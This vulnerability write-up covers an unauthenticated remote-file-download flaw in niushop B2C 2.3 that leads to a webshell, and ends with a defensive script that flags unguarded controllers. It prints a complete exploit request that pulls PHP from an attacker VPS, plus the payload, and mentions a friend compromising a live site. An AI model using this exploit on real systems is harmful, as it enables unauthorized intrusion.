0x00 Preface
A while ago a friend asked me to help look at a site built on niushop cms. I had not analyzed this CMS before and had no time to follow up; when I asked today, the friend had already taken the site.
I asked how it was done and reproduce the vulnerability here. (Clearing out my notes backlog; this article dates from January of this year.)
0x01 Affected versions
Version: niushopB2C free edition 2.3
Last updated: 2019-04-18
0day: No (this is a 1-day)
0x02 Vulnerability details
Look at the update_file_download method in data\extend\upgrade\Upgrade.php. The method accepts an external URL from which it downloads an upgrade package and writes the package contents straight to disk.
Note, however, that the downloaded content must be larger than 500 bytes.
A global search for callers of this function leads to application\admin\controller\Upgradeonline.php, i.e. the Upgradeonline controller. The controller lives under the admin directory and should require administrator privileges, but by mistake it extends the Controller class instead of BaseController, so the endpoint can be reached without logging in.
So, by requesting the downloadPatchZip action of the Upgradeonline controller and passing a PHP file hosted on our own external web server as download_url, the file is fetched onto the server and we get a shell.
0x03 Reproduction
Construct the request as follows:
POST /index.php?s=/admin/Upgradeonline/downloadPatchZip HTTP/1.1
Host: target.com
Content-Length: 58
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: zh-CN,zh;q=0.9
Connection: close

download_url=http://vpsip:8090/1.php&patch_release=1
Start a simple web server on the VPS with Python:
python -m SimpleHTTPServer 8090
Contents of 1.php (the comment is padding to satisfy the 500-byte minimum):
<?php
phpinfo();
/*
abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
abcdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
*/
?>

Download succeeded.

Extract the path returned in the response and visit it to get a shell:

0x04 Summary
The root cause of this hole is the same as the code execution in thinkcmf x. When auditing CMS code built as secondary development on top of ThinkPHP, keep an eye out for authorization failures caused by controllers inheriting from the wrong base class.
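As an added example (not from the original post or the niushop project), a small audit helper that scans ThinkPHP admin controller sources for classes extending the framework Controller rather than the project's BaseController, which is exactly the inheritance mistake described above. The controller sources and file names below are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed sample controller sources (not the real niushop files).
# Upgradeonline mirrors the pattern from the write-up: an admin controller
# that extends the framework Controller instead of BaseController.
SAMPLE_CONTROLLERS = {
    "application/admin/controller/Goods.php": """<?php
namespace app\\admin\\controller;
class Goods extends BaseController
{
    public function index() { return 'ok'; }
}
""",
    "application/admin/controller/Upgradeonline.php": """<?php
namespace app\\admin\\controller;
use think\\Controller;
class Upgradeonline extends Controller
{
    public function downloadPatchZip() { /* downloads and unpacks a patch */ }
}
""",
    "application/admin/controller/BaseController.php": """<?php
namespace app\\admin\\controller;
use think\\Controller;
class BaseController extends Controller
{
    // Performs the admin login check in its constructor.
}
""",
}

CLASS_RE = re.compile(r"\bclass\s+(\w+)\s+extends\s+([\w\\]+)")
USE_RE = re.compile(r"^\s*use\s+([\w\\]+)(?:\s+as\s+(\w+))?\s*;", re.MULTILINE)

def find_unguarded_controllers(sources: Dict[str, str], base: str = "BaseController") -> List[str]:
    """Return 'path: Class extends Parent' for every controller whose parent is not `base`.
    The base class itself is exempt: it is the one expected to wrap the framework Controller.
    Parents are compared by short name only, which is enough for a first-pass audit."""
    flagged = []
    for path, src in sources.items():
        # Resolve `use think\Controller;` / `use X as Y;` so the report shows the real parent.
        aliases = {}
        for fqcn, alias in USE_RE.findall(src):
            aliases[alias or fqcn.rsplit("\\", 1)[-1]] = fqcn
        for cls, parent in CLASS_RE.findall(src):
            if cls == base:
                continue
            parent_fqcn = aliases.get(parent, parent)
            if parent_fqcn.rsplit("\\", 1)[-1] != base:
                flagged.append(f"{path}: {cls} extends {parent_fqcn}")
    return flagged

if __name__ == "__main__":
    for line in find_unguarded_controllers(SAMPLE_CONTROLLERS):
        print(line)
```

Pointing the same function at the real contents of application/admin/controller would list every controller that bypasses the BaseController login check.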
